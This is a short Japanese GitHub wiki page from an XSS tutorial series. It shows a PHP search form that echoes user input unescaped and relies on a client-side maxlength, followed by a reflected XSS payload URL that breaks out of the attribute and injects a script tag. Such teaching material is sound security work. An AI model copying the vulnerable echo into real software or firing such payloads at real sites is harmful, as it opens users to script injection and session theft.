クロスサイトスクリプティング 03 - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 3

maxlength="10"の反射型XSS

脆弱なソースコード (PHP)

<form method="get" action="">login<br>
search<input name="search" type="text" maxlength="10" value="<?php echo filter_input(INPUT_GET, 'search'); ?>"><br>
<input type="submit" value="search">
</form>

攻撃方法

xss-03.php?search="><script>alert(1)</script>

⚠️ GitHub.com Fallback ⚠️